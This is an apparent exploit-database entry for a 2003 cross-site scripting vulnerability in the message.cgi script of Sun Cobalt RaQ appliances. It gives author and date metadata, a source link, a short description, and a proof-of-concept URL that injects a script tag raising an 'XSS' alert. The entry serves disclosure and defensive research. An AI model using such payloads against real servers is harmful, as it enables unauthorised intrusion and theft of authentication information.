Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - 'Message.cgi' Cross-Site Scripting

Author: Lorenzo Hernandez Garcia-Hierro
type: webapps
platform: cgi
port: 
date_added: 2003-10-03  
date_updated: 2012-12-08  
verified: 1  
codes: OSVDB-2257  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23214.txt  
source: https://www.securityfocus.com/bid/8757/info

A problem with message.cgi script used by Cobalt RaQ appliances could lead to cross-site scripting. This could result in attacks attempting to steal authentication information.

http://wwww.example.com:81/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C/script%3E